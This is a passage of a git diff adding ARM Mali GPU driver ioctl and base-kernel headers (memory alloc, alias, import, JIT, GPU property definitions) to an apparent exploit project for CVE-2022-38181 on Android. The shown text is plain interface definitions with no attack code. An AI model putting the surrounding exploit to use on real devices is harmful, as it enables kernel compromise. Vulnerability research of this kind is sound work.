+ struct kbase_kinstr_jm_fd_out out;
+};
+
+#define KBASE_IOCTL_KINSTR_JM_FD \
+ _IOWR(KBASE_IOCTL_TYPE, 51, union kbase_kinstr_jm_fd)
+
+
+#define KBASE_IOCTL_VERSION_CHECK_RESERVED \
+ _IOWR(KBASE_IOCTL_TYPE, 52, struct kbase_ioctl_version_check)
+
+#define KBASE_IOCTL_TYPE 0x80
+
+/**
+ * struct kbase_ioctl_set_flags - Set kernel context creation flags
+ *
+ * @create_flags: Flags - see base_context_create_flags
+ */
+struct kbase_ioctl_set_flags {
+ __u32 create_flags;
+};
+
+#define KBASE_IOCTL_SET_FLAGS \
+ _IOW(KBASE_IOCTL_TYPE, 1, struct kbase_ioctl_set_flags)
+
+/**
+ * struct kbase_ioctl_get_gpuprops - Read GPU properties from the kernel
+ *
+ * @buffer: Pointer to the buffer to store properties into
+ * @size: Size of the buffer
+ * @flags: Flags - must be zero for now
+ *
+ * The ioctl will return the number of bytes stored into @buffer or an error
+ * on failure (e.g. @size is too small). If @size is specified as 0 then no
+ * data will be written but the return value will be the number of bytes needed
+ * for all the properties.
+ *
+ * @flags may be used in the future to request a different format for the
+ * buffer. With @flags == 0 the following format is used.
+ *
+ * The buffer will be filled with pairs of values, a __u32 key identifying the
+ * property followed by the value. The size of the value is identified using
+ * the bottom bits of the key. The value then immediately followed the key and
+ * is tightly packed (there is no padding). All keys and values are
+ * little-endian.
+ *
+ * 00 = __u8
+ * 01 = __u16
+ * 10 = __u32
+ * 11 = __u64
+ */
+struct kbase_ioctl_get_gpuprops {
+ __u64 buffer;
+ __u32 size;
+ __u32 flags;
+};
+
+#define KBASE_IOCTL_GET_GPUPROPS \
+ _IOW(KBASE_IOCTL_TYPE, 3, struct kbase_ioctl_get_gpuprops)
+
+/**
+ * union kbase_ioctl_mem_alloc - Allocate memory on the GPU
+ * @in: Input parameters
+ * @in.va_pages: The number of pages of virtual address space to reserve
+ * @in.commit_pages: The number of physical pages to allocate
+ * @in.extension: The number of extra pages to allocate on each GPU fault which grows the region
+ * @in.flags: Flags
+ * @out: Output parameters
+ * @out.flags: Flags
+ * @out.gpu_va: The GPU virtual address which is allocated
+ */
+union kbase_ioctl_mem_alloc {
+ struct {
+ __u64 va_pages;
+ __u64 commit_pages;
+ __u64 extension;
+ __u64 flags;
+ } in;
+ struct {
+ __u64 flags;
+ __u64 gpu_va;
+ } out;
+};
+
+#define KBASE_IOCTL_MEM_ALLOC \
+ _IOWR(KBASE_IOCTL_TYPE, 5, union kbase_ioctl_mem_alloc)
+
+/**
+ * struct kbase_ioctl_mem_query - Query properties of a GPU memory region
+ * @in: Input parameters
+ * @in.gpu_addr: A GPU address contained within the region
+ * @in.query: The type of query
+ * @out: Output parameters
+ * @out.value: The result of the query
+ *
+ * Use a %KBASE_MEM_QUERY_xxx flag as input for @query.
+ */
+union kbase_ioctl_mem_query {
+ struct {
+ __u64 gpu_addr;
+ __u64 query;
+ } in;
+ struct {
+ __u64 value;
+ } out;
+};
+
+#define KBASE_IOCTL_MEM_QUERY \
+ _IOWR(KBASE_IOCTL_TYPE, 6, union kbase_ioctl_mem_query)
+
+#define KBASE_MEM_QUERY_COMMIT_SIZE ((__u64)1)
+#define KBASE_MEM_QUERY_VA_SIZE ((__u64)2)
+#define KBASE_MEM_QUERY_FLAGS ((__u64)3)
+
+/**
+ * struct kbase_ioctl_mem_free - Free a memory region
+ * @gpu_addr: Handle to the region to free
+ */
+struct kbase_ioctl_mem_free {
+ __u64 gpu_addr;
+};
+
+#define KBASE_IOCTL_MEM_FREE \
+ _IOW(KBASE_IOCTL_TYPE, 7, struct kbase_ioctl_mem_free)
+
+/**
+ * struct kbase_ioctl_hwcnt_reader_setup - Setup HWC dumper/reader
+ * @buffer_count: requested number of dumping buffers
+ * @fe_bm: counters selection bitmask (Front end)
+ * @shader_bm: counters selection bitmask (Shader)
+ * @tiler_bm: counters selection bitmask (Tiler)
+ * @mmu_l2_bm: counters selection bitmask (MMU_L2)
+ *
+ * A fd is returned from the ioctl if successful, or a negative value on error
+ */
+struct kbase_ioctl_hwcnt_reader_setup {
+ __u32 buffer_count;
+ __u32 fe_bm;
+ __u32 shader_bm;
+ __u32 tiler_bm;
+ __u32 mmu_l2_bm;
+};
+
+#define KBASE_IOCTL_HWCNT_READER_SETUP \
+ _IOW(KBASE_IOCTL_TYPE, 8, struct kbase_ioctl_hwcnt_reader_setup)
+
+/**
+ * struct kbase_ioctl_hwcnt_enable - Enable hardware counter collection
+ * @dump_buffer: GPU address to write counters to
+ * @fe_bm: counters selection bitmask (Front end)
+ * @shader_bm: counters selection bitmask (Shader)
+ * @tiler_bm: counters selection bitmask (Tiler)
+ * @mmu_l2_bm: counters selection bitmask (MMU_L2)
+ */
+struct kbase_ioctl_hwcnt_enable {
+ __u64 dump_buffer;
+ __u32 fe_bm;
+ __u32 shader_bm;
+ __u32 tiler_bm;
+ __u32 mmu_l2_bm;
+};
+
+#define KBASE_IOCTL_HWCNT_ENABLE \
+ _IOW(KBASE_IOCTL_TYPE, 9, struct kbase_ioctl_hwcnt_enable)
+
+#define KBASE_IOCTL_HWCNT_DUMP \
+ _IO(KBASE_IOCTL_TYPE, 10)
+
+#define KBASE_IOCTL_HWCNT_CLEAR \
+ _IO(KBASE_IOCTL_TYPE, 11)
+
+/**
+ * struct kbase_ioctl_hwcnt_values - Values to set dummy the dummy counters to.
+ * @data: Counter samples for the dummy model.
+ * @size: Size of the counter sample data.
+ * @padding: Padding.
+ */
+struct kbase_ioctl_hwcnt_values {
+ __u64 data;
+ __u32 size;
+ __u32 padding;
+};
+
+#define KBASE_IOCTL_HWCNT_SET \
+ _IOW(KBASE_IOCTL_TYPE, 32, struct kbase_ioctl_hwcnt_values)
+
+/**
+ * struct kbase_ioctl_disjoint_query - Query the disjoint counter
+ * @counter: A counter of disjoint events in the kernel
+ */
+struct kbase_ioctl_disjoint_query {
+ __u32 counter;
+};
+
+#define KBASE_IOCTL_DISJOINT_QUERY \
+ _IOR(KBASE_IOCTL_TYPE, 12, struct kbase_ioctl_disjoint_query)
+
+/**
+ * struct kbase_ioctl_get_ddk_version - Query the kernel version
+ * @version_buffer: Buffer to receive the kernel version string
+ * @size: Size of the buffer
+ * @padding: Padding
+ *
+ * The ioctl will return the number of bytes written into version_buffer
+ * (which includes a NULL byte) or a negative error code
+ *
+ * The ioctl request code has to be _IOW because the data in ioctl struct is
+ * being copied to the kernel, even though the kernel then writes out the
+ * version info to the buffer specified in the ioctl.
+ */
+struct kbase_ioctl_get_ddk_version {
+ __u64 version_buffer;
+ __u32 size;
+ __u32 padding;
+};
+
+#define KBASE_IOCTL_GET_DDK_VERSION \
+ _IOW(KBASE_IOCTL_TYPE, 13, struct kbase_ioctl_get_ddk_version)
+
+/**
+ * struct kbase_ioctl_mem_jit_init_10_2 - Initialize the just-in-time memory
+ * allocator (between kernel driver
+ * version 10.2--11.4)
+ * @va_pages: Number of VA pages to reserve for JIT
+ *
+ * Note that depending on the VA size of the application and GPU, the value
+ * specified in @va_pages may be ignored.
+ *
+ * New code should use KBASE_IOCTL_MEM_JIT_INIT instead, this is kept for
+ * backwards compatibility.
+ */
+struct kbase_ioctl_mem_jit_init_10_2 {
+ __u64 va_pages;
+};
+
+#define KBASE_IOCTL_MEM_JIT_INIT_10_2 \
+ _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init_10_2)
+
+/**
+ * struct kbase_ioctl_mem_jit_init_11_5 - Initialize the just-in-time memory
+ * allocator (between kernel driver
+ * version 11.5--11.19)
+ * @va_pages: Number of VA pages to reserve for JIT
+ * @max_allocations: Maximum number of concurrent allocations
+ * @trim_level: Level of JIT allocation trimming to perform on free (0 - 100%)
+ * @group_id: Group ID to be used for physical allocations
+ * @padding: Currently unused, must be zero
+ *
+ * Note that depending on the VA size of the application and GPU, the value
+ * specified in @va_pages may be ignored.
+ *
+ * New code should use KBASE_IOCTL_MEM_JIT_INIT instead, this is kept for
+ * backwards compatibility.
+ */
+struct kbase_ioctl_mem_jit_init_11_5 {
+ __u64 va_pages;
+ __u8 max_allocations;
+ __u8 trim_level;
+ __u8 group_id;
+ __u8 padding[5];
+};
+
+#define KBASE_IOCTL_MEM_JIT_INIT_11_5 \
+ _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init_11_5)
+
+/**
+ * struct kbase_ioctl_mem_jit_init - Initialize the just-in-time memory
+ * allocator
+ * @va_pages: Number of GPU virtual address pages to reserve for just-in-time
+ * memory allocations
+ * @max_allocations: Maximum number of concurrent allocations
+ * @trim_level: Level of JIT allocation trimming to perform on free (0 - 100%)
+ * @group_id: Group ID to be used for physical allocations
+ * @padding: Currently unused, must be zero
+ * @phys_pages: Maximum number of physical pages to allocate just-in-time
+ *
+ * Note that depending on the VA size of the application and GPU, the value
+ * specified in @va_pages may be ignored.
+ */
+struct kbase_ioctl_mem_jit_init {
+ __u64 va_pages;
+ __u8 max_allocations;
+ __u8 trim_level;
+ __u8 group_id;
+ __u8 padding[5];
+ __u64 phys_pages;
+};
+
+#define KBASE_IOCTL_MEM_JIT_INIT \
+ _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init)
+
+/**
+ * struct kbase_ioctl_mem_sync - Perform cache maintenance on memory
+ *
+ * @handle: GPU memory handle (GPU VA)
+ * @user_addr: The address where it is mapped in user space
+ * @size: The number of bytes to synchronise
+ * @type: The direction to synchronise: 0 is sync to memory (clean),
+ * 1 is sync from memory (invalidate). Use the BASE_SYNCSET_OP_xxx constants.
+ * @padding: Padding to round up to a multiple of 8 bytes, must be zero
+ */
+struct kbase_ioctl_mem_sync {
+ __u64 handle;
+ __u64 user_addr;
+ __u64 size;
+ __u8 type;
+ __u8 padding[7];
+};
+
+#define KBASE_IOCTL_MEM_SYNC \
+ _IOW(KBASE_IOCTL_TYPE, 15, struct kbase_ioctl_mem_sync)
+
+/**
+ * union kbase_ioctl_mem_find_cpu_offset - Find the offset of a CPU pointer
+ *
+ * @in: Input parameters
+ * @in.gpu_addr: The GPU address of the memory region
+ * @in.cpu_addr: The CPU address to locate
+ * @in.size: A size in bytes to validate is contained within the region
+ * @out: Output parameters
+ * @out.offset: The offset from the start of the memory region to @cpu_addr
+ */
+union kbase_ioctl_mem_find_cpu_offset {
+ struct {
+ __u64 gpu_addr;
+ __u64 cpu_addr;
+ __u64 size;
+ } in;
+ struct {
+ __u64 offset;
+ } out;
+};
+
+#define KBASE_IOCTL_MEM_FIND_CPU_OFFSET \
+ _IOWR(KBASE_IOCTL_TYPE, 16, union kbase_ioctl_mem_find_cpu_offset)
+
+/**
+ * struct kbase_ioctl_get_context_id - Get the kernel context ID
+ *
+ * @id: The kernel context ID
+ */
+struct kbase_ioctl_get_context_id {
+ __u32 id;
+};
+
+#define KBASE_IOCTL_GET_CONTEXT_ID \
+ _IOR(KBASE_IOCTL_TYPE, 17, struct kbase_ioctl_get_context_id)
+
+/**
+ * struct kbase_ioctl_tlstream_acquire - Acquire a tlstream fd
+ *
+ * @flags: Flags
+ *
+ * The ioctl returns a file descriptor when successful
+ */
+struct kbase_ioctl_tlstream_acquire {
+ __u32 flags;
+};
+
+#define KBASE_IOCTL_TLSTREAM_ACQUIRE \
+ _IOW(KBASE_IOCTL_TYPE, 18, struct kbase_ioctl_tlstream_acquire)
+
+#define KBASE_IOCTL_TLSTREAM_FLUSH \
+ _IO(KBASE_IOCTL_TYPE, 19)
+
+/**
+ * struct kbase_ioctl_mem_commit - Change the amount of memory backing a region
+ *
+ * @gpu_addr: The memory region to modify
+ * @pages: The number of physical pages that should be present
+ *
+ * The ioctl may return on the following error codes or 0 for success:
+ * -ENOMEM: Out of memory
+ * -EINVAL: Invalid arguments
+ */
+struct kbase_ioctl_mem_commit {
+ __u64 gpu_addr;
+ __u64 pages;
+};
+
+#define KBASE_IOCTL_MEM_COMMIT \
+ _IOW(KBASE_IOCTL_TYPE, 20, struct kbase_ioctl_mem_commit)
+
+/**
+ * union kbase_ioctl_mem_alias - Create an alias of memory regions
+ * @in: Input parameters
+ * @in.flags: Flags, see BASE_MEM_xxx
+ * @in.stride: Bytes between start of each memory region
+ * @in.nents: The number of regions to pack together into the alias
+ * @in.aliasing_info: Pointer to an array of struct base_mem_aliasing_info
+ * @out: Output parameters
+ * @out.flags: Flags, see BASE_MEM_xxx
+ * @out.gpu_va: Address of the new alias
+ * @out.va_pages: Size of the new alias
+ */
+union kbase_ioctl_mem_alias {
+ struct {
+ __u64 flags;
+ __u64 stride;
+ __u64 nents;
+ __u64 aliasing_info;
+ } in;
+ struct {
+ __u64 flags;
+ __u64 gpu_va;
+ __u64 va_pages;
+ } out;
+};
+
+#define KBASE_IOCTL_MEM_ALIAS \
+ _IOWR(KBASE_IOCTL_TYPE, 21, union kbase_ioctl_mem_alias)
+
+enum base_mem_import_type {
+ BASE_MEM_IMPORT_TYPE_INVALID = 0,
+ /*
+ * Import type with value 1 is deprecated.
+ */
+ BASE_MEM_IMPORT_TYPE_UMM = 2,
+ BASE_MEM_IMPORT_TYPE_USER_BUFFER = 3
+};
+
+/**
+ * struct base_mem_import_user_buffer - Handle of an imported user buffer
+ *
+ * @ptr: address of imported user buffer
+ * @length: length of imported user buffer in bytes
+ *
+ * This structure is used to represent a handle of an imported user buffer.
+ */
+
+struct base_mem_import_user_buffer {
+ __u64 ptr;
+ __u64 length;
+};
+
+/**
+ * union kbase_ioctl_mem_import - Import memory for use by the GPU
+ * @in: Input parameters
+ * @in.flags: Flags, see BASE_MEM_xxx
+ * @in.phandle: Handle to the external memory
+ * @in.type: Type of external memory, see base_mem_import_type
+ * @in.padding: Amount of extra VA pages to append to the imported buffer
+ * @out: Output parameters
+ * @out.flags: Flags, see BASE_MEM_xxx
+ * @out.gpu_va: Address of the new alias
+ * @out.va_pages: Size of the new alias
+ */
+union kbase_ioctl_mem_import {
+ struct {
+ __u64 flags;
+ __u64 phandle;
+ __u32 type;
+ __u32 padding;
+ } in;
+ struct {
+ __u64 flags;
+ __u64 gpu_va;
+ __u64 va_pages;
+ } out;
+};
+
+#define KBASE_IOCTL_MEM_IMPORT \
+ _IOWR(KBASE_IOCTL_TYPE, 22, union kbase_ioctl_mem_import)
+
+/**
+ * struct kbase_ioctl_mem_flags_change - Change the flags for a memory region
+ * @gpu_va: The GPU region to modify
+ * @flags: The new flags to set
+ * @mask: Mask of the flags to modify
+ */
+struct kbase_ioctl_mem_flags_change {
+ __u64 gpu_va;
+ __u64 flags;
+ __u64 mask;
+};
+
+#define KBASE_IOCTL_MEM_FLAGS_CHANGE \
+ _IOW(KBASE_IOCTL_TYPE, 23, struct kbase_ioctl_mem_flags_change)
+
+/**
+ * struct kbase_ioctl_stream_create - Create a synchronisation stream
+ * @name: A name to identify this stream. Must be NULL-terminated.
+ *
+ * Note that this is also called a "timeline", but is named stream to avoid
+ * confusion with other uses of the word.
+ *
+ * Unused bytes in @name (after the first NULL byte) must be also be NULL bytes.
+ *
+ * The ioctl returns a file descriptor.
+ */
+struct kbase_ioctl_stream_create {
+ char name[32];
+};
+
+#define KBASE_IOCTL_STREAM_CREATE \
+ _IOW(KBASE_IOCTL_TYPE, 24, struct kbase_ioctl_stream_create)
+
+/**
+ * struct kbase_ioctl_fence_validate - Validate a fd refers to a fence
+ * @fd: The file descriptor to validate
+ */
+struct kbase_ioctl_fence_validate {
+ int fd;
+};
+
+#define KBASE_IOCTL_FENCE_VALIDATE \
+ _IOW(KBASE_IOCTL_TYPE, 25, struct kbase_ioctl_fence_validate)
+
+/**
+ * struct kbase_ioctl_mem_profile_add - Provide profiling information to kernel
+ * @buffer: Pointer to the information
+ * @len: Length
+ * @padding: Padding
+ *
+ * The data provided is accessible through a debugfs file
+ */
+struct kbase_ioctl_mem_profile_add {
+ __u64 buffer;
+ __u32 len;
+ __u32 padding;
+};
+
+#define KBASE_IOCTL_MEM_PROFILE_ADD \
+ _IOW(KBASE_IOCTL_TYPE, 27, struct kbase_ioctl_mem_profile_add)
+
+/**
+ * struct kbase_ioctl_sticky_resource_map - Permanently map an external resource
+ * @count: Number of resources
+ * @address: Array of __u64 GPU addresses of the external resources to map
+ */
+struct kbase_ioctl_sticky_resource_map {
+ __u64 count;
+ __u64 address;
+};
+
+#define KBASE_IOCTL_STICKY_RESOURCE_MAP \
+ _IOW(KBASE_IOCTL_TYPE, 29, struct kbase_ioctl_sticky_resource_map)
+
+/**
+ * struct kbase_ioctl_sticky_resource_map - Unmap a resource mapped which was
+ * previously permanently mapped
+ * @count: Number of resources
+ * @address: Array of __u64 GPU addresses of the external resources to unmap
+ */
+struct kbase_ioctl_sticky_resource_unmap {
+ __u64 count;
+ __u64 address;
+};
+
+#define KBASE_IOCTL_STICKY_RESOURCE_UNMAP \
+ _IOW(KBASE_IOCTL_TYPE, 30, struct kbase_ioctl_sticky_resource_unmap)
+
+/**
+ * union kbase_ioctl_mem_find_gpu_start_and_offset - Find the start address of
+ * the GPU memory region for
+ * the given gpu address and
+ * the offset of that address
+ * into the region
+ * @in: Input parameters
+ * @in.gpu_addr: GPU virtual address
+ * @in.size: Size in bytes within the region
+ * @out: Output parameters
+ * @out.start: Address of the beginning of the memory region enclosing @gpu_addr
+ * for the length of @offset bytes
+ * @out.offset: The offset from the start of the memory region to @gpu_addr
+ */
+union kbase_ioctl_mem_find_gpu_start_and_offset {
+ struct {
+ __u64 gpu_addr;
+ __u64 size;
+ } in;
+ struct {
+ __u64 start;
+ __u64 offset;
+ } out;
+};
+
+#define KBASE_IOCTL_MEM_FIND_GPU_START_AND_OFFSET \
+ _IOWR(KBASE_IOCTL_TYPE, 31, union kbase_ioctl_mem_find_gpu_start_and_offset)
+
+#define KBASE_IOCTL_CINSTR_GWT_START \
+ _IO(KBASE_IOCTL_TYPE, 33)
+
+#define KBASE_IOCTL_CINSTR_GWT_STOP \
+ _IO(KBASE_IOCTL_TYPE, 34)
+
+/**
+ * union kbase_ioctl_gwt_dump - Used to collect all GPU write fault addresses.
+ * @in: Input parameters
+ * @in.addr_buffer: Address of buffer to hold addresses of gpu modified areas.
+ * @in.size_buffer: Address of buffer to hold size of modified areas (in pages)
+ * @in.len: Number of addresses the buffers can hold.
+ * @in.padding: padding
+ * @out: Output parameters
+ * @out.no_of_addr_collected: Number of addresses collected into addr_buffer.
+ * @out.more_data_available: Status indicating if more addresses are available.
+ * @out.padding: padding
+ *
+ * This structure is used when performing a call to dump GPU write fault
+ * addresses.
+ */
+union kbase_ioctl_cinstr_gwt_dump {
+ struct {
+ __u64 addr_buffer;
+ __u64 size_buffer;
+ __u32 len;
+ __u32 padding;
+
+ } in;
+ struct {
+ __u32 no_of_addr_collected;
+ __u8 more_data_available;
+ __u8 padding[27];
+ } out;
+};
+
+#define KBASE_IOCTL_CINSTR_GWT_DUMP \
+ _IOWR(KBASE_IOCTL_TYPE, 35, union kbase_ioctl_cinstr_gwt_dump)
+
+/**
+ * struct kbase_ioctl_mem_exec_init - Initialise the EXEC_VA memory zone
+ *
+ * @va_pages: Number of VA pages to reserve for EXEC_VA
+ */
+struct kbase_ioctl_mem_exec_init {
+ __u64 va_pages;
+};
+
+#define KBASE_IOCTL_MEM_EXEC_INIT \
+ _IOW(KBASE_IOCTL_TYPE, 38, struct kbase_ioctl_mem_exec_init)
+
+/**
+ * union kbase_ioctl_get_cpu_gpu_timeinfo - Request zero or more types of
+ * cpu/gpu time (counter values)
+ * @in: Input parameters
+ * @in.request_flags: Bit-flags indicating the requested types.
+ * @in.paddings: Unused, size alignment matching the out.
+ * @out: Output parameters
+ * @out.sec: Integer field of the monotonic time, unit in seconds.
+ * @out.nsec: Fractional sec of the monotonic time, in nano-seconds.
+ * @out.padding: Unused, for __u64 alignment
+ * @out.timestamp: System wide timestamp (counter) value.
+ * @out.cycle_counter: GPU cycle counter value.
+ */
+union kbase_ioctl_get_cpu_gpu_timeinfo {
+ struct {
+ __u32 request_flags;
+ __u32 paddings[7];
+ } in;
+ struct {
+ __u64 sec;
+ __u32 nsec;
+ __u32 padding;
+ __u64 timestamp;
+ __u64 cycle_counter;
+ } out;
+};
+
+#define KBASE_IOCTL_GET_CPU_GPU_TIMEINFO \
+ _IOWR(KBASE_IOCTL_TYPE, 50, union kbase_ioctl_get_cpu_gpu_timeinfo)
+
+/**
+ * struct kbase_ioctl_context_priority_check - Check the max possible priority
+ * @priority: Input priority & output priority
+ */
+
+struct kbase_ioctl_context_priority_check {
+ __u8 priority;
+};
+
+#define KBASE_IOCTL_CONTEXT_PRIORITY_CHECK \
+ _IOWR(KBASE_IOCTL_TYPE, 54, struct kbase_ioctl_context_priority_check)
+
+/**
+ * struct kbase_ioctl_set_limited_core_count - Set the limited core count.
+ *
+ * @max_core_count: Maximum core count
+ */
+struct kbase_ioctl_set_limited_core_count {
+ __u8 max_core_count;
+};
+
+#define KBASE_IOCTL_SET_LIMITED_CORE_COUNT \
+ _IOW(KBASE_IOCTL_TYPE, 55, struct kbase_ioctl_set_limited_core_count)
+
+
+/***************
+ * Pixel ioctls *
+ ***************/
+
+/**
+ * struct kbase_ioctl_apc_request - GPU asynchronous power control (APC) request
+ *
+ * @dur_usec: Duration for GPU to stay awake.
+ */
+struct kbase_ioctl_apc_request {
+ __u32 dur_usec;
+};
+
+#define KBASE_IOCTL_APC_REQUEST \
+ _IOW(KBASE_IOCTL_TYPE, 66, struct kbase_ioctl_apc_request)
+
+/***************
+ * test ioctls *
+ ***************/
+#if MALI_UNIT_TEST
+/* These ioctls are purely for test purposes and are not used in the production
+ * driver, they therefore may change without notice
+ */
+
+#define KBASE_IOCTL_TEST_TYPE (KBASE_IOCTL_TYPE + 1)
+
+
+/**
+ * struct kbase_ioctl_tlstream_stats - Read tlstream stats for test purposes
+ * @bytes_collected: number of bytes read by user
+ * @bytes_generated: number of bytes generated by tracepoints
+ */
+struct kbase_ioctl_tlstream_stats {
+ __u32 bytes_collected;
+ __u32 bytes_generated;
+};
+
+#define KBASE_IOCTL_TLSTREAM_STATS \
+ _IOR(KBASE_IOCTL_TEST_TYPE, 2, struct kbase_ioctl_tlstream_stats)
+
+#endif /* MALI_UNIT_TEST */
+
+/* Customer extension range */
+#define KBASE_IOCTL_EXTRA_TYPE (KBASE_IOCTL_TYPE + 2)
+
+/* If the integration needs extra ioctl add them there
+ * like this:
+ *
+ * struct my_ioctl_args {
+ * ....
+ * }
+ *
+ * #define KBASE_IOCTL_MY_IOCTL \
+ * _IOWR(KBASE_IOCTL_EXTRA_TYPE, 0, struct my_ioctl_args)
+ */
+
+
+/**********************************
+ * Definitions for GPU properties *
+ **********************************/
+#define KBASE_GPUPROP_VALUE_SIZE_U8 (0x0)
+#define KBASE_GPUPROP_VALUE_SIZE_U16 (0x1)
+#define KBASE_GPUPROP_VALUE_SIZE_U32 (0x2)
+#define KBASE_GPUPROP_VALUE_SIZE_U64 (0x3)
+
+#define KBASE_GPUPROP_PRODUCT_ID 1
+#define KBASE_GPUPROP_VERSION_STATUS 2
+#define KBASE_GPUPROP_MINOR_REVISION 3
+#define KBASE_GPUPROP_MAJOR_REVISION 4
+/* 5 previously used for GPU speed */
+#define KBASE_GPUPROP_GPU_FREQ_KHZ_MAX 6
+/* 7 previously used for minimum GPU speed */
+#define KBASE_GPUPROP_LOG2_PROGRAM_COUNTER_SIZE 8
+#define KBASE_GPUPROP_TEXTURE_FEATURES_0 9
+#define KBASE_GPUPROP_TEXTURE_FEATURES_1 10
+#define KBASE_GPUPROP_TEXTURE_FEATURES_2 11
+#define KBASE_GPUPROP_GPU_AVAILABLE_MEMORY_SIZE 12
+
+#define KBASE_GPUPROP_L2_LOG2_LINE_SIZE 13
+#define KBASE_GPUPROP_L2_LOG2_CACHE_SIZE 14
+#define KBASE_GPUPROP_L2_NUM_L2_SLICES 15
+
+#define KBASE_GPUPROP_TILER_BIN_SIZE_BYTES 16
+#define KBASE_GPUPROP_TILER_MAX_ACTIVE_LEVELS 17
+
+#define KBASE_GPUPROP_MAX_THREADS 18
+#define KBASE_GPUPROP_MAX_WORKGROUP_SIZE 19
+#define KBASE_GPUPROP_MAX_BARRIER_SIZE 20
+#define KBASE_GPUPROP_MAX_REGISTERS 21
+#define KBASE_GPUPROP_MAX_TASK_QUEUE 22
+#define KBASE_GPUPROP_MAX_THREAD_GROUP_SPLIT 23
+#define KBASE_GPUPROP_IMPL_TECH 24
+
+#define KBASE_GPUPROP_RAW_SHADER_PRESENT 25
+#define KBASE_GPUPROP_RAW_TILER_PRESENT 26
+#define KBASE_GPUPROP_RAW_L2_PRESENT 27
+#define KBASE_GPUPROP_RAW_STACK_PRESENT 28
+#define KBASE_GPUPROP_RAW_L2_FEATURES 29
+#define KBASE_GPUPROP_RAW_CORE_FEATURES 30
+#define KBASE_GPUPROP_RAW_MEM_FEATURES 31
+#define KBASE_GPUPROP_RAW_MMU_FEATURES 32
+#define KBASE_GPUPROP_RAW_AS_PRESENT 33
+#define KBASE_GPUPROP_RAW_JS_PRESENT 34
+#define KBASE_GPUPROP_RAW_JS_FEATURES_0 35
+#define KBASE_GPUPROP_RAW_JS_FEATURES_1 36
+#define KBASE_GPUPROP_RAW_JS_FEATURES_2 37
+#define KBASE_GPUPROP_RAW_JS_FEATURES_3 38
+#define KBASE_GPUPROP_RAW_JS_FEATURES_4 39
+#define KBASE_GPUPROP_RAW_JS_FEATURES_5 40
+#define KBASE_GPUPROP_RAW_JS_FEATURES_6 41
+#define KBASE_GPUPROP_RAW_JS_FEATURES_7 42
+#define KBASE_GPUPROP_RAW_JS_FEATURES_8 43
+#define KBASE_GPUPROP_RAW_JS_FEATURES_9 44
+#define KBASE_GPUPROP_RAW_JS_FEATURES_10 45
+#define KBASE_GPUPROP_RAW_JS_FEATURES_11 46
+#define KBASE_GPUPROP_RAW_JS_FEATURES_12 47
+#define KBASE_GPUPROP_RAW_JS_FEATURES_13 48
+#define KBASE_GPUPROP_RAW_JS_FEATURES_14 49
+#define KBASE_GPUPROP_RAW_JS_FEATURES_15 50
+#define KBASE_GPUPROP_RAW_TILER_FEATURES 51
+#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_0 52
+#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_1 53
+#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_2 54
+#define KBASE_GPUPROP_RAW_GPU_ID 55
+#define KBASE_GPUPROP_RAW_THREAD_MAX_THREADS 56
+#define KBASE_GPUPROP_RAW_THREAD_MAX_WORKGROUP_SIZE 57
+#define KBASE_GPUPROP_RAW_THREAD_MAX_BARRIER_SIZE 58
+#define KBASE_GPUPROP_RAW_THREAD_FEATURES 59
+#define KBASE_GPUPROP_RAW_COHERENCY_MODE 60
+
+#define KBASE_GPUPROP_COHERENCY_NUM_GROUPS 61
+#define KBASE_GPUPROP_COHERENCY_NUM_CORE_GROUPS 62
+#define KBASE_GPUPROP_COHERENCY_COHERENCY 63
+#define KBASE_GPUPROP_COHERENCY_GROUP_0 64
+#define KBASE_GPUPROP_COHERENCY_GROUP_1 65
+#define KBASE_GPUPROP_COHERENCY_GROUP_2 66
+#define KBASE_GPUPROP_COHERENCY_GROUP_3 67
+#define KBASE_GPUPROP_COHERENCY_GROUP_4 68
+#define KBASE_GPUPROP_COHERENCY_GROUP_5 69
+#define KBASE_GPUPROP_COHERENCY_GROUP_6 70
+#define KBASE_GPUPROP_COHERENCY_GROUP_7 71
+#define KBASE_GPUPROP_COHERENCY_GROUP_8 72
+#define KBASE_GPUPROP_COHERENCY_GROUP_9 73
+#define KBASE_GPUPROP_COHERENCY_GROUP_10 74
+#define KBASE_GPUPROP_COHERENCY_GROUP_11 75
+#define KBASE_GPUPROP_COHERENCY_GROUP_12 76
+#define KBASE_GPUPROP_COHERENCY_GROUP_13 77
+#define KBASE_GPUPROP_COHERENCY_GROUP_14 78
+#define KBASE_GPUPROP_COHERENCY_GROUP_15 79
+
+#define KBASE_GPUPROP_TEXTURE_FEATURES_3 80
+#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_3 81
+
+#define KBASE_GPUPROP_NUM_EXEC_ENGINES 82
+
+#define KBASE_GPUPROP_RAW_THREAD_TLS_ALLOC 83
+#define KBASE_GPUPROP_TLS_ALLOC 84
+#define KBASE_GPUPROP_RAW_GPU_FEATURES 85
+
+#define BASE_MEM_MAP_TRACKING_HANDLE (3ull << 12)
+
+#endif /* _UAPI_KBASE_JM_IOCTL_H_ */
+
diff --git a/SecurityExploits/Android/Mali/CVE_2022_38181/mali_base_jm_kernel.h b/SecurityExploits/Android/Mali/CVE_2022_38181/mali_base_jm_kernel.h
new file mode 100644
index 0000000..b1cf438
--- /dev/null
+++ b/SecurityExploits/Android/Mali/CVE_2022_38181/mali_base_jm_kernel.h
@@ -0,0 +1,1216 @@
+/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */
+/*
+ *
+ * (C) COPYRIGHT 2019-2021 ARM Limited. All rights reserved.
+ *
+ * This program is free software and is provided to you under the terms of the
+ * GNU General Public License version 2 as published by the Free Software
+ * Foundation, and any use by you of this program is subject to the terms
+ * of such GNU license.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program; if not, you can access it online at
+ * http://www.gnu.org/licenses/gpl-2.0.html.
+ *
+ */
+
+#ifndef _UAPI_BASE_JM_KERNEL_H_
+#define _UAPI_BASE_JM_KERNEL_H_
+
+#include
+
+typedef __u32 base_mem_alloc_flags;
+/* Memory allocation, access/hint flags.
+ *
+ * See base_mem_alloc_flags.
+ */
+
